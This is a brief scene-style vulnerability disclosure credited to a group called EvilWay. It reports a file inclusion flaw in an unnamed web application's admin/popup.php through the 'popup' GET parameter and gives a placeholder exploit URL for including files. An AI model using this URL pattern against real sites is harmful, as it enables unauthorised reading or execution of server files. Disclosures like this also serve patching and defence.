/*

Author          : MizoZ [from MA]
Group           : EvilWay
Email           : mizozx[at]gmail[dot]com

Greetz          : Zuka !!

Good luck DZ :)

*/

The vulnerability is in the file admin/popup.php on the get $_GET['popup']

Exploit :

[HOST]/[PATH]/admin/popup.php?popup=[IT INCLUDE FROM admin/]